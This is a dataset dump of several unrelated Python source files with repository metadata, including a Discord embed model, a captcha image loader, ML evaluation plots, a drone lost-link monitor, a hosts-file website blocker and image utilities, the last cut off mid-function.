return A.T @ np.linalg.inv(A @ A.T) @ closures
def get_closures(A, phi):
'''
Use matrix mult to generate vector of phase closures such that
the angle xi = phi_12 + phi_23 - phi_13
'''
return A @ np.angle(phi)
# Vector of phases with zero phase closure errors
closed = np.exp(1j * np.array([0.5, 1, 0.5]))
# Vector of phases with non-zero closure errors
unclosed = np.exp(1j * np.array([0.5, 1 + 0.1, 0.5 + 0.1]))
def main(phis):
ind = np.array([1, 2, 3])
A = np.array([[1, -1, 1]])
# Phases to phase closures
closures = get_closures(A, phis)
# Phase closures back to phases
least_norm_phi = least_norm(A, closures)
print('Phase closures: ', closures)
plt.plot(ind, np.angle(closed), label='observed phases')
plt.plot(ind, np.angle(least_norm_phi), label='least norm phases ')
plt.plot(ind, np.angle(closed * least_norm_phi.conj()),
label='Corrected Phases')
plt.legend(loc='lower left')
plt.show()
main(unclosed)
| en | 0.876257 | Solve: Ax = b Find the minimum norm vector 'x' of phases that can explain 'b' phase closures Use matrix mult to generate vector of phase closures such that the angle xi = phi_12 + phi_23 - phi_13 # Vector of phases with zero phase closure errors # Vector of phases with non-zero closure errors # Phases to phase closures # Phase closures back to phases | 3.206147 | 3 |
wumpus/models/embed.py | jay3332/wumpus.py | 4 | 6623910 | from dataclasses import dataclass
from typing import List, Optional
from .objects import Timestamp
from ..typings import JSON
from ..typings.payloads import (
EmbedPayload,
EmbedAuthorPayload,
EmbedFooterPayload,
EmbedFieldPayload
)
@dataclass
class EmbedField:
"""Represents a field of an :class:`Embed`.
Attributes
----------
name: str
The name of the field.
value: str
The value of the field.
inline: bool
Whether or not this field should be displayed inline.
"""
name: str
value: str
inline: bool = True
def to_json(self, /) -> EmbedFieldPayload:
return {
'name': self.name,
'value': self.value,
'inline': self.inline
}
@dataclass
class EmbedAuthor:
"""Represents the author of an :class:`Embed`.
Attributes
----------
name: str
The name of the author.
url: str
The redirect URL of the author.
icon_url: str
The URL of the author's icon.
"""
name: str
url: str
icon_url: str
@dataclass
class EmbedFooter:
"""Represents the footer of an :class:`Embed`.
"""
text: str
icon_url: str
proxy_icon_url: str
class Embed:
"""Represents a Discord embed.
"""
def __init__(
self,
json: JSON = None,
/,
**fields
):
if json is not None:
self._from_json(json)
def _from_json(self, json: EmbedPayload, /) -> None:
self.title: str = json.get('title')
self.type: str = json.get('type', 'rich')
self.description: str = json.get('description')
self.url: str = json.get('url')
_timestamp = json.get('timestamp')
if _timestamp is not None:
self.timestamp: Optional[Timestamp] = Timestamp.fromisoformat(_timestamp)
# # TODO: Color class
self.color: int = json.get('color')
self.fields: List[EmbedField] = [EmbedField(**field) for field in json.get('fields', [])]
_author = json.get('author')
_footer = json.get('footer')
self.author: Optional[EmbedAuthor] = EmbedAuthor(**_author) if _author is not None else None
self.footer: Optional[EmbedFooter] = EmbedFooter(**_footer) if _footer is not None else None
# TODO: The other keys
def to_json(self) -> EmbedPayload:
embed = {
'type': self.type or 'rich',
'title': self.title,
'description': self.description,
'url': self.url,
'timestamp': self.timestamp.isoformat() if self.timestamp is not None else None,
'color': self.color,
'author': self.author.to_json()
}
| from dataclasses import dataclass
from typing import List, Optional
from .objects import Timestamp
from ..typings import JSON
from ..typings.payloads import (
EmbedPayload,
EmbedAuthorPayload,
EmbedFooterPayload,
EmbedFieldPayload
)
@dataclass
class EmbedField:
"""Represents a field of an :class:`Embed`.
Attributes
----------
name: str
The name of the field.
value: str
The value of the field.
inline: bool
Whether or not this field should be displayed inline.
"""
name: str
value: str
inline: bool = True
def to_json(self, /) -> EmbedFieldPayload:
return {
'name': self.name,
'value': self.value,
'inline': self.inline
}
@dataclass
class EmbedAuthor:
"""Represents the author of an :class:`Embed`.
Attributes
----------
name: str
The name of the author.
url: str
The redirect URL of the author.
icon_url: str
The URL of the author's icon.
"""
name: str
url: str
icon_url: str
@dataclass
class EmbedFooter:
"""Represents the footer of an :class:`Embed`.
"""
text: str
icon_url: str
proxy_icon_url: str
class Embed:
"""Represents a Discord embed.
"""
def __init__(
self,
json: JSON = None,
/,
**fields
):
if json is not None:
self._from_json(json)
def _from_json(self, json: EmbedPayload, /) -> None:
self.title: str = json.get('title')
self.type: str = json.get('type', 'rich')
self.description: str = json.get('description')
self.url: str = json.get('url')
_timestamp = json.get('timestamp')
if _timestamp is not None:
self.timestamp: Optional[Timestamp] = Timestamp.fromisoformat(_timestamp)
# # TODO: Color class
self.color: int = json.get('color')
self.fields: List[EmbedField] = [EmbedField(**field) for field in json.get('fields', [])]
_author = json.get('author')
_footer = json.get('footer')
self.author: Optional[EmbedAuthor] = EmbedAuthor(**_author) if _author is not None else None
self.footer: Optional[EmbedFooter] = EmbedFooter(**_footer) if _footer is not None else None
# TODO: The other keys
def to_json(self) -> EmbedPayload:
embed = {
'type': self.type or 'rich',
'title': self.title,
'description': self.description,
'url': self.url,
'timestamp': self.timestamp.isoformat() if self.timestamp is not None else None,
'color': self.color,
'author': self.author.to_json()
}
| en | 0.540759 | Represents a field of an :class:`Embed`. Attributes ---------- name: str The name of the field. value: str The value of the field. inline: bool Whether or not this field should be displayed inline. Represents the author of an :class:`Embed`. Attributes ---------- name: str The name of the author. url: str The redirect URL of the author. icon_url: str The URL of the author's icon. Represents the footer of an :class:`Embed`. Represents a Discord embed. # # TODO: Color class # TODO: The other keys | 3.001357 | 3 |
CaptchaBreaker_cmd/load.py | alstjgg/captcha_image_preprocess | 2 | 6623911 | import requests
import cv2
import numpy as np
# Download captcha images from link and save
def get_image_link(link):
"""Download image from given url.
:param link: given url where image is located
:return: image downloaded from url
"""
req = requests.get(link)
try:
req.raise_for_status()
except Exception as exc:
print('There was a problem: %s' % exc)
loaded_image = req.content
loaded_image = cv2.imdecode(np.asarray(bytearray(loaded_image)), 1)
loaded_image = cv2.cvtColor(loaded_image, cv2.COLOR_BGR2GRAY)
return loaded_image
# Get image from external file(path)
def get_image_path(path):
"""Load image from local directory.
:param path: given path where image is stored
:return: image loaded from directory
"""
loaded_image = cv2.imread(path)
loaded_image = cv2.cvtColor(loaded_image, cv2.COLOR_BGR2GRAY)
label = ((path.split('/')[-1]).split('\\')[-1]).split('.')[0]
return loaded_image, label
# Determine if input is link or path & return image
def get_image(which):
"""Decide if parameter is a link or directory, and load image from it.
:param which: link or directory to where image is located
:return: image pulled from link or directory
"""
try:
image = get_image_link(which)
return image
except:
try:
image, label = get_image_path(which)
return image
except:
print('Load error. Try again')
| import requests
import cv2
import numpy as np
# Download captcha images from link and save
def get_image_link(link):
"""Download image from given url.
:param link: given url where image is located
:return: image downloaded from url
"""
req = requests.get(link)
try:
req.raise_for_status()
except Exception as exc:
print('There was a problem: %s' % exc)
loaded_image = req.content
loaded_image = cv2.imdecode(np.asarray(bytearray(loaded_image)), 1)
loaded_image = cv2.cvtColor(loaded_image, cv2.COLOR_BGR2GRAY)
return loaded_image
# Get image from external file(path)
def get_image_path(path):
"""Load image from local directory.
:param path: given path where image is stored
:return: image loaded from directory
"""
loaded_image = cv2.imread(path)
loaded_image = cv2.cvtColor(loaded_image, cv2.COLOR_BGR2GRAY)
label = ((path.split('/')[-1]).split('\\')[-1]).split('.')[0]
return loaded_image, label
# Determine if input is link or path & return image
def get_image(which):
"""Decide if parameter is a link or directory, and load image from it.
:param which: link or directory to where image is located
:return: image pulled from link or directory
"""
try:
image = get_image_link(which)
return image
except:
try:
image, label = get_image_path(which)
return image
except:
print('Load error. Try again')
| en | 0.896329 | # Download captcha images from link and save Download image from given url. :param link: given url where image is located :return: image downloaded from url # Get image from external file(path) Load image from local directory. :param path: given path where image is stored :return: image loaded from directory # Determine if input is link or path & return image Decide if parameter is a link or directory, and load image from it. :param which: link or directory to where image is located :return: image pulled from link or directory | 3.219502 | 3 |
visualize_graph_model_performance.py | dimitermilev/ML_predict_hospitalization_risk_ED_pts | 0 | 6623912 | from sklearn.metrics import confusion_matrix, precision_score, recall_score, precision_recall_curve,f1_score, fbeta_score
import seaborn as sns
from matplotlib import pyplot as plt
%matplotlib inline
def graph_roc(data, features, optimal_feature_num, model, title):
'''Build a ROC AUC curve graph with matplotlib'''
X_train, X_train_sc, X_test, X_test_sc, y_train, y_test = split_data(data, features, optimal_feature_num)
fpr, tpr, thresholds = roc_curve(y_test, model.predict_proba(X_test)[:,1])
plt.plot(fpr, tpr,lw=2)
plt.plot([0,1],[0,1],c='violet',ls='--')
plt.xlim([-0.05,1.05])
plt.ylim([-0.05,1.05])
plt.xlabel('False positive rate')
plt.ylabel('True positive rate')
plt.title('ROC curve');
print(f"{title} ROC AUC score = ", roc_auc_score(y_test, model.predict_proba(X_test)[:,1]))
def make_confusion_matrix(data, features, optimal_feature_num, model, threshold=0.5):
'''Build confusion matrix with seaborn. Leverage the predict_proba function of models to adjust threshold'''
X_train, X_train_sc, X_test, X_test_sc, y_train, y_test = split_data(data, features, optimal_feature_num)
y_predict = (model.predict_proba(X_test)[:, 1] >= threshold)
hosp_confusion = confusion_matrix(y_test, y_predict)
plt.figure(dpi=80)
sns.heatmap(hosp_confusion, cmap=plt.cm.Blues, annot=True, square=True, fmt='d',
xticklabels=['Discharged', 'Hospitalized'],
yticklabels=['Discharged', 'Hospitalized']);
plt.xlabel('prediction')
plt.ylabel('actual')
def make_precision_recall_curves(data, features, optimal_feature_num, model):
'''Plot precision and recall curves for desired model'''
X_train, X_train_sc, X_test, X_test_sc, y_train, y_test = split_data(data, features, optimal_feature_num)
precision_curve, recall_curve, threshold_curve = precision_recall_curve(y_test, model.predict_proba(X_test)[:,1] )
plt.figure(dpi=80)
plt.plot(threshold_curve, precision_curve[1:],label='precision')
plt.plot(threshold_curve, recall_curve[1:], label='recall')
plt.legend(loc='lower left')
plt.xlabel('Threshold (above this probability, label as hospitalization)');
plt.title('Precision and Recall Curves');
| from sklearn.metrics import confusion_matrix, precision_score, recall_score, precision_recall_curve,f1_score, fbeta_score
import seaborn as sns
from matplotlib import pyplot as plt
%matplotlib inline
def graph_roc(data, features, optimal_feature_num, model, title):
'''Build a ROC AUC curve graph with matplotlib'''
X_train, X_train_sc, X_test, X_test_sc, y_train, y_test = split_data(data, features, optimal_feature_num)
fpr, tpr, thresholds = roc_curve(y_test, model.predict_proba(X_test)[:,1])
plt.plot(fpr, tpr,lw=2)
plt.plot([0,1],[0,1],c='violet',ls='--')
plt.xlim([-0.05,1.05])
plt.ylim([-0.05,1.05])
plt.xlabel('False positive rate')
plt.ylabel('True positive rate')
plt.title('ROC curve');
print(f"{title} ROC AUC score = ", roc_auc_score(y_test, model.predict_proba(X_test)[:,1]))
def make_confusion_matrix(data, features, optimal_feature_num, model, threshold=0.5):
'''Build confusion matrix with seaborn. Leverage the predict_proba function of models to adjust threshold'''
X_train, X_train_sc, X_test, X_test_sc, y_train, y_test = split_data(data, features, optimal_feature_num)
y_predict = (model.predict_proba(X_test)[:, 1] >= threshold)
hosp_confusion = confusion_matrix(y_test, y_predict)
plt.figure(dpi=80)
sns.heatmap(hosp_confusion, cmap=plt.cm.Blues, annot=True, square=True, fmt='d',
xticklabels=['Discharged', 'Hospitalized'],
yticklabels=['Discharged', 'Hospitalized']);
plt.xlabel('prediction')
plt.ylabel('actual')
def make_precision_recall_curves(data, features, optimal_feature_num, model):
'''Plot precision and recall curves for desired model'''
X_train, X_train_sc, X_test, X_test_sc, y_train, y_test = split_data(data, features, optimal_feature_num)
precision_curve, recall_curve, threshold_curve = precision_recall_curve(y_test, model.predict_proba(X_test)[:,1] )
plt.figure(dpi=80)
plt.plot(threshold_curve, precision_curve[1:],label='precision')
plt.plot(threshold_curve, recall_curve[1:], label='recall')
plt.legend(loc='lower left')
plt.xlabel('Threshold (above this probability, label as hospitalization)');
plt.title('Precision and Recall Curves');
| en | 0.792006 | Build a ROC AUC curve graph with matplotlib Build confusion matrix with seaborn. Leverage the predict_proba function of models to adjust threshold Plot precision and recall curves for desired model | 2.85413 | 3 |
src/mission/task/lost_link.py | AuraUAS/aura-core | 8 | 6623913 | <reponame>AuraUAS/aura-core
# lost_link.py: monitors messages from the ground station and flags an
# alert when too much time has elapsed since the last received
# message. If airborne at this time, request the circle home task
# which sends the aircraft home to circle. The operator much chose
# the next course of action after link is successfully resumed.
# Otherwise the assumption is that once returned home and circling,
# the operator could take over manual control and land the aircraft
# manually.
import mission.mission_mgr
from PropertyTree import PropertyNode
import comms.events
from mission.task.task import Task
class LostLink(Task):
def __init__(self, config_node):
Task.__init__(self)
self.status_node = PropertyNode("/status")
self.task_node = PropertyNode("/task")
self.home_node = PropertyNode("/task/home")
self.targets_node = PropertyNode("/autopilot/targets")
self.remote_link_node = PropertyNode("/comms/remote_link")
self.remote_link_node.setString("link", "inactive")
self.link_state = False
self.push_task = ""
self.name = config_node.getString("name")
self.timeout_sec = config_node.getDouble("timeout_sec")
if self.timeout_sec < 1.0:
# set a sane default if none provided
self.timetout_sec = 60.0
def activate(self):
self.active = True
comms.events.log("comms", "lost link monitor started")
def update(self, dt):
if not self.active:
return
# FIXME: this needs to be fleshed out a *lot* more in the future
# with more flexible options. FIXME: what about a sensible
# fallback in case we can't find the push_task or other desired
# actions?
last_message_sec = self.remote_link_node.getDouble("last_message_sec")
if last_message_sec < 0.00001:
# likely zero, likely never received a message from GCS yet
return
current_time = self.status_node.getDouble("frame_time")
message_age = current_time - last_message_sec
# print "update lost link task, msg age = %.1f timeout=%.1f" % \
# (message_age, self.timeout_sec)
if message_age > self.timeout_sec:
# lost link state
if self.link_state:
self.link_state = False
self.remote_link_node.setString("link", "lost")
comms.events.log("comms", "link timed out (lost) last_message=%.1f timeout_sec=%.1f" % (last_message_sec, self.timeout_sec))
# do lost link action here (iff airborne)
if self.task_node.getBool("is_airborne"):
comms.events.log("lost_link", "circle home")
mission.mission_mgr.m.request_task_home()
# sanity check on transit altitude (boost to 200'
# agl if below that)
target_agl = self.targets_node.getDouble("altitude_agl_ft")
if target_agl < 200.0:
self.targets_node.setDouble("altitude_agl_ft", 200.0)
else:
# good link state
if not self.link_state:
self.link_state = True
self.remote_link_node.setString("link", "ok")
comms.events.log("comms", "link ok")
# Note: don't take any action when/if link resumes
# (simply continue with circle home task). Operator
# decision/action required to for next steps.
def is_complete(self):
return False
def close(self):
self.active = False
return True
| # lost_link.py: monitors messages from the ground station and flags an
# alert when too much time has elapsed since the last received
# message. If airborne at this time, request the circle home task
# which sends the aircraft home to circle. The operator much chose
# the next course of action after link is successfully resumed.
# Otherwise the assumption is that once returned home and circling,
# the operator could take over manual control and land the aircraft
# manually.
import mission.mission_mgr
from PropertyTree import PropertyNode
import comms.events
from mission.task.task import Task
class LostLink(Task):
def __init__(self, config_node):
Task.__init__(self)
self.status_node = PropertyNode("/status")
self.task_node = PropertyNode("/task")
self.home_node = PropertyNode("/task/home")
self.targets_node = PropertyNode("/autopilot/targets")
self.remote_link_node = PropertyNode("/comms/remote_link")
self.remote_link_node.setString("link", "inactive")
self.link_state = False
self.push_task = ""
self.name = config_node.getString("name")
self.timeout_sec = config_node.getDouble("timeout_sec")
if self.timeout_sec < 1.0:
# set a sane default if none provided
self.timetout_sec = 60.0
def activate(self):
self.active = True
comms.events.log("comms", "lost link monitor started")
def update(self, dt):
if not self.active:
return
# FIXME: this needs to be fleshed out a *lot* more in the future
# with more flexible options. FIXME: what about a sensible
# fallback in case we can't find the push_task or other desired
# actions?
last_message_sec = self.remote_link_node.getDouble("last_message_sec")
if last_message_sec < 0.00001:
# likely zero, likely never received a message from GCS yet
return
current_time = self.status_node.getDouble("frame_time")
message_age = current_time - last_message_sec
# print "update lost link task, msg age = %.1f timeout=%.1f" % \
# (message_age, self.timeout_sec)
if message_age > self.timeout_sec:
# lost link state
if self.link_state:
self.link_state = False
self.remote_link_node.setString("link", "lost")
comms.events.log("comms", "link timed out (lost) last_message=%.1f timeout_sec=%.1f" % (last_message_sec, self.timeout_sec))
# do lost link action here (iff airborne)
if self.task_node.getBool("is_airborne"):
comms.events.log("lost_link", "circle home")
mission.mission_mgr.m.request_task_home()
# sanity check on transit altitude (boost to 200'
# agl if below that)
target_agl = self.targets_node.getDouble("altitude_agl_ft")
if target_agl < 200.0:
self.targets_node.setDouble("altitude_agl_ft", 200.0)
else:
# good link state
if not self.link_state:
self.link_state = True
self.remote_link_node.setString("link", "ok")
comms.events.log("comms", "link ok")
# Note: don't take any action when/if link resumes
# (simply continue with circle home task). Operator
# decision/action required to for next steps.
def is_complete(self):
return False
def close(self):
self.active = False
return True | en | 0.880181 | # lost_link.py: monitors messages from the ground station and flags an # alert when too much time has elapsed since the last received # message. If airborne at this time, request the circle home task # which sends the aircraft home to circle. The operator much chose # the next course of action after link is successfully resumed. # Otherwise the assumption is that once returned home and circling, # the operator could take over manual control and land the aircraft # manually. # set a sane default if none provided # FIXME: this needs to be fleshed out a *lot* more in the future # with more flexible options. FIXME: what about a sensible # fallback in case we can't find the push_task or other desired # actions? # likely zero, likely never received a message from GCS yet # print "update lost link task, msg age = %.1f timeout=%.1f" % \ # (message_age, self.timeout_sec) # lost link state # do lost link action here (iff airborne) # sanity check on transit altitude (boost to 200' # agl if below that) # good link state # Note: don't take any action when/if link resumes # (simply continue with circle home task). Operator # decision/action required to for next steps. | 2.714616 | 3 |
hackerrank/domain/algorithms/sorting/running_time.py | spradeepv/dive-into-python | 0 | 6623914 | <gh_stars>0
"""
"""
def insertionSort(ar):
length = len(ar)
stop = False
index = 1
running_time = 0
while not stop:
num = ar[index]
for i in range(index - 1, -1, -1):
if num < ar[i]:
ar[i + 1], ar[i] = ar[i], num
running_time += 1
index += 1
if index == length:
stop = True
print running_time
m = input()
ar = [int(i) for i in raw_input().strip().split()]
insertionSort(ar) | """
"""
def insertionSort(ar):
length = len(ar)
stop = False
index = 1
running_time = 0
while not stop:
num = ar[index]
for i in range(index - 1, -1, -1):
if num < ar[i]:
ar[i + 1], ar[i] = ar[i], num
running_time += 1
index += 1
if index == length:
stop = True
print running_time
m = input()
ar = [int(i) for i in raw_input().strip().split()]
insertionSort(ar) | none | 1 | 3.693583 | 4 | |
beproductive/blocker.py | JohannesStutz/beproductive | 2 | 6623915 | # AUTOGENERATED! DO NOT EDIT! File to edit: 01_blocker.ipynb (unless otherwise specified).
__all__ = ['APP_NAME', 'REDIRECT', 'WIN_PATH', 'LINUX_PATH', 'NOTIFY_DURATION', 'ICON_PATH', 'host_fp', 'host_fp_copy',
'host_fp_blocked', 'Blocker']
# Cell
from pathlib import Path
from shutil import copy
import beproductive.config as config
import sys
try:
from win10toast import ToastNotifier
win_notify = ToastNotifier()
except:
win_notify = False
# Cell
APP_NAME = 'Be Productive'
REDIRECT = '127.0.0.1'
WIN_PATH = r'C:\Windows\System32\drivers\etc'
LINUX_PATH = r'/etc'
NOTIFY_DURATION = 5 # CHANGE TO 5 FOR PRODUCTION
ICON_PATH = 'icon.ico'
if sys.platform == 'win32':
host_path = Path(WIN_PATH)
else:
host_path = Path(LINUX_PATH)
host_fp = host_path/'hosts'
host_fp_copy = host_path/'hosts.original'
host_fp_blocked = host_path/'hosts.blocked'
# Cell
class Blocker():
"The core of the package. It modifies the hosts file of the OS."
def __init__(self, redirect=REDIRECT):
self.adminrights = False
self.redirect = redirect
self.blocklist = config.load_config()
if not host_fp_copy.exists():
self._setup()
if self._create_blocked_list():
self.adminrights = True
def _setup(self):
"Creates a copy of the `hosts` file and saves it as `hosts.original`"
try:
copy(host_fp, host_fp_copy)
self.notify("Setup successful")
except PermissionError:
self._raise_permission_error()
def _create_blocked_list(self):
"Creates a copy of `hosts.original` and saves it to `hosts.blocked`. Then adds all blocked sites."
try:
copy(host_fp_copy, host_fp_blocked)
with open(host_fp_blocked, "a") as blocked_file:
for url in self.blocklist:
# TODO: refine, add www only if not in url, remove www if in url
blocked_file.write(f"{self.redirect} {url} www.{url} api.{url}\n")
# Special case for Twitter which has a special API URL
if url == 'twitter.com':
blocked_file.write(f"{self.redirect} tpop-api.twitter.com\n")
return True
except PermissionError:
self._raise_permission_error()
return False
def block(self, notify=False):
"Blocks all specified websites by replacing `hosts` file with `hosts.blocked`"
try:
copy(host_fp_blocked, host_fp)
except PermissionError:
self._raise_permission_error()
return False
if notify:
self.notify("Websites blocked, enjoy your work.")
return "Websites blocked"
def unblock(self, notify=False):
"Unblocks all websites by restoring the original `hosts` file"
try:
copy(host_fp_copy, host_fp)
except PermissionError:
self._raise_permission_error()
return False
if notify:
self.notify("All websites unblocked.")
return "Websites unblocked"
def notify(self, message, title=APP_NAME, duration=NOTIFY_DURATION):
"Sends notification to CLI and - if available - to GUI"
print(message)
if win_notify:
win_notify.show_toast(title, message, duration=duration)
def _raise_permission_error(self):
self.notify("Permission Error. Please run the command line tool as ADMINISTRATOR.") | # AUTOGENERATED! DO NOT EDIT! File to edit: 01_blocker.ipynb (unless otherwise specified).
__all__ = ['APP_NAME', 'REDIRECT', 'WIN_PATH', 'LINUX_PATH', 'NOTIFY_DURATION', 'ICON_PATH', 'host_fp', 'host_fp_copy',
'host_fp_blocked', 'Blocker']
# Cell
from pathlib import Path
from shutil import copy
import beproductive.config as config
import sys
try:
from win10toast import ToastNotifier
win_notify = ToastNotifier()
except:
win_notify = False
# Cell
APP_NAME = 'Be Productive'
REDIRECT = '127.0.0.1'
WIN_PATH = r'C:\Windows\System32\drivers\etc'
LINUX_PATH = r'/etc'
NOTIFY_DURATION = 5 # CHANGE TO 5 FOR PRODUCTION
ICON_PATH = 'icon.ico'
if sys.platform == 'win32':
host_path = Path(WIN_PATH)
else:
host_path = Path(LINUX_PATH)
host_fp = host_path/'hosts'
host_fp_copy = host_path/'hosts.original'
host_fp_blocked = host_path/'hosts.blocked'
# Cell
class Blocker():
"The core of the package. It modifies the hosts file of the OS."
def __init__(self, redirect=REDIRECT):
self.adminrights = False
self.redirect = redirect
self.blocklist = config.load_config()
if not host_fp_copy.exists():
self._setup()
if self._create_blocked_list():
self.adminrights = True
def _setup(self):
"Creates a copy of the `hosts` file and saves it as `hosts.original`"
try:
copy(host_fp, host_fp_copy)
self.notify("Setup successful")
except PermissionError:
self._raise_permission_error()
def _create_blocked_list(self):
"Creates a copy of `hosts.original` and saves it to `hosts.blocked`. Then adds all blocked sites."
try:
copy(host_fp_copy, host_fp_blocked)
with open(host_fp_blocked, "a") as blocked_file:
for url in self.blocklist:
# TODO: refine, add www only if not in url, remove www if in url
blocked_file.write(f"{self.redirect} {url} www.{url} api.{url}\n")
# Special case for Twitter which has a special API URL
if url == 'twitter.com':
blocked_file.write(f"{self.redirect} tpop-api.twitter.com\n")
return True
except PermissionError:
self._raise_permission_error()
return False
def block(self, notify=False):
"Blocks all specified websites by replacing `hosts` file with `hosts.blocked`"
try:
copy(host_fp_blocked, host_fp)
except PermissionError:
self._raise_permission_error()
return False
if notify:
self.notify("Websites blocked, enjoy your work.")
return "Websites blocked"
def unblock(self, notify=False):
"Unblocks all websites by restoring the original `hosts` file"
try:
copy(host_fp_copy, host_fp)
except PermissionError:
self._raise_permission_error()
return False
if notify:
self.notify("All websites unblocked.")
return "Websites unblocked"
def notify(self, message, title=APP_NAME, duration=NOTIFY_DURATION):
"Sends notification to CLI and - if available - to GUI"
print(message)
if win_notify:
win_notify.show_toast(title, message, duration=duration)
def _raise_permission_error(self):
self.notify("Permission Error. Please run the command line tool as ADMINISTRATOR.") | en | 0.560087 | # AUTOGENERATED! DO NOT EDIT! File to edit: 01_blocker.ipynb (unless otherwise specified). # Cell # Cell # CHANGE TO 5 FOR PRODUCTION # Cell # TODO: refine, add www only if not in url, remove www if in url # Special case for Twitter which has a special API URL | 2.03647 | 2 |
doc/users/plotting/examples/anchored_box03.py | pierre-haessig/matplotlib | 16 | 6623916 | from matplotlib.patches import Ellipse
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid.anchored_artists import AnchoredAuxTransformBox
fig=plt.figure(1, figsize=(3,3))
ax = plt.subplot(111)
box = AnchoredAuxTransformBox(ax.transData, loc=2)
el = Ellipse((0,0), width=0.1, height=0.4, angle=30) # in data coordinates!
box.drawing_area.add_artist(el)
ax.add_artist(box)
plt.show()
| from matplotlib.patches import Ellipse
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid.anchored_artists import AnchoredAuxTransformBox
fig=plt.figure(1, figsize=(3,3))
ax = plt.subplot(111)
box = AnchoredAuxTransformBox(ax.transData, loc=2)
el = Ellipse((0,0), width=0.1, height=0.4, angle=30) # in data coordinates!
box.drawing_area.add_artist(el)
ax.add_artist(box)
plt.show()
| en | 0.566245 | # in data coordinates! | 2.808593 | 3 |
experiment_2_face_tasks/Doric/__init__.py | arcosin/Task-Detector | 0 | 6623917 | <reponame>arcosin/Task-Detector
from .ProgNet import ProgBlock
from .ProgNet import ProgMultiBlock
from .ProgNet import ProgColumnGenerator
from .ProgNet import ProgColumn
from .ProgNet import ProgNet
from .ProgBlocks import ProgDenseBlock
from .ProgBlocks import ProgDenseBNBlock
from .ProgBlocks import ProgMultiDense
from .ProgBlocks import ProgMultiDenseBN
from .ProgBlocks import ProgMultiDenseSum
from .ProgBlocks import ProgMultiDenseConcat
from .ProgBlocks import ProgLambdaBlock
from .ProgBlocks import ProgInertBlock
from .extra_blocks.ConvBlocks import ProgConv2DBlock
from .extra_blocks.ConvBlocks import ProgConvTranspose2DBNBlock
from .extra_blocks.ConvBlocks import ProgConv2DBNBlock
from .extra_blocks.ConvBlocks import ProgDeformConv2DBlock
from .extra_blocks.ConvBlocks import ProgDeformConv2DBNBlock
from .ProgNetTarget import ProgNetWithTarget
from .DynamicProgNet import DynamicProgNet
DORIC_VERSION = "1.0.1"
#===============================================================================
| from .ProgNet import ProgBlock
from .ProgNet import ProgMultiBlock
from .ProgNet import ProgColumnGenerator
from .ProgNet import ProgColumn
from .ProgNet import ProgNet
from .ProgBlocks import ProgDenseBlock
from .ProgBlocks import ProgDenseBNBlock
from .ProgBlocks import ProgMultiDense
from .ProgBlocks import ProgMultiDenseBN
from .ProgBlocks import ProgMultiDenseSum
from .ProgBlocks import ProgMultiDenseConcat
from .ProgBlocks import ProgLambdaBlock
from .ProgBlocks import ProgInertBlock
from .extra_blocks.ConvBlocks import ProgConv2DBlock
from .extra_blocks.ConvBlocks import ProgConvTranspose2DBNBlock
from .extra_blocks.ConvBlocks import ProgConv2DBNBlock
from .extra_blocks.ConvBlocks import ProgDeformConv2DBlock
from .extra_blocks.ConvBlocks import ProgDeformConv2DBNBlock
from .ProgNetTarget import ProgNetWithTarget
from .DynamicProgNet import DynamicProgNet
DORIC_VERSION = "1.0.1"
#=============================================================================== | fr | 0.346644 | #=============================================================================== | 1.25846 | 1 |
ex018.py | gabrieleliasdev/python-cev | 0 | 6623918 | from math import sin, cos, tan, radians
a = float(input('\nType the angle you want:\n>>> '))
s = sin(radians(a))
c = cos(radians(a))
t = tan(radians(a))
print('\nThe is Sine: {:.2f} | Cosine: {:.2f} | Tangent: {:.2f}\n'.format(s,c,t))
| from math import sin, cos, tan, radians
a = float(input('\nType the angle you want:\n>>> '))
s = sin(radians(a))
c = cos(radians(a))
t = tan(radians(a))
print('\nThe is Sine: {:.2f} | Cosine: {:.2f} | Tangent: {:.2f}\n'.format(s,c,t))
| none | 1 | 4.143839 | 4 | |
constants.py | kennjr/PasswordLocker | 0 | 6623919 | <gh_stars>0
database_name = "lockerdatabase.db"
create_login_table_str = """ CREATE TABLE IF NOT EXISTS Login (
id INTEGER PRIMARY KEY,
username TEXT NOT NULL,
password TEXT NOT NULL,
date_logged_in TEXT NOT NULL
); """
check_if_table_exists_str = """SELECT count(name) FROM sqlite_master WHERE type='table' AND name='Login' """
| database_name = "lockerdatabase.db"
create_login_table_str = """ CREATE TABLE IF NOT EXISTS Login (
id INTEGER PRIMARY KEY,
username TEXT NOT NULL,
password TEXT NOT NULL,
date_logged_in TEXT NOT NULL
); """
check_if_table_exists_str = """SELECT count(name) FROM sqlite_master WHERE type='table' AND name='Login' """ | en | 0.397143 | CREATE TABLE IF NOT EXISTS Login ( id INTEGER PRIMARY KEY, username TEXT NOT NULL, password TEXT NOT NULL, date_logged_in TEXT NOT NULL ); SELECT count(name) FROM sqlite_master WHERE type='table' AND name='Login' | 2.93713 | 3 |
gen_route.py | yang0/proxy | 0 | 6623920 | from haipproxy.utils.route_info import gen_route_updater
if __name__ == '__main__':
gen_route_updater() | from haipproxy.utils.route_info import gen_route_updater
if __name__ == '__main__':
gen_route_updater() | none | 1 | 1.189085 | 1 | |
mlxtend/mlxtend/image/utils.py | WhiteWolf21/fp-growth | 0 | 6623921 | # <NAME> 2014-2020
# contributor: <NAME>
# mlxtend Machine Learning Library Extensions
#
# A counter class for printing the progress of an iterator.
# Author: <NAME> <<EMAIL>>
#
# License: BSD 3 clause
import os
import tarfile
import zipfile
import bz2
import imageio
def check_exists(path):
path = os.path.expanduser(path)
return os.path.exists(path)
def makedir(path):
path = os.path.expanduser(path)
if not check_exists(path):
os.makedirs(path)
def listdir(path, extensions=''):
path = os.path.expanduser(path)
if check_exists(path):
return [f for f in os.listdir(path) if f.endswith(extensions)]
else:
raise FileNotFoundError
def read_image(filename, path=None):
if path is not None:
path = os.path.expanduser(path)
filename = os.path.join(path, filename)
if check_exists(filename):
return imageio.imread(filename)
else:
raise FileNotFoundError
def download_url(url, save_path):
from six.moves import urllib
save_path = os.path.expanduser(save_path)
if not check_exists(save_path):
makedir(save_path)
filename = url.rpartition('/')[2]
filepath = os.path.join(save_path, filename)
try:
print('Downloading '+url+' to '+filepath)
urllib.request.urlretrieve(url, filepath)
except ValueError:
raise Exception('Failed to download! Check URL: ' + url +
' and local path: ' + save_path)
def extract_file(path, to_directory=None):
path = os.path.expanduser(path)
if path.endswith('.zip'):
opener, mode = zipfile.ZipFile, 'r'
elif path.endswith(('.tar.gz', '.tgz')):
opener, mode = tarfile.open, 'r:gz'
elif path.endswith(('tar.bz2', '.tbz')):
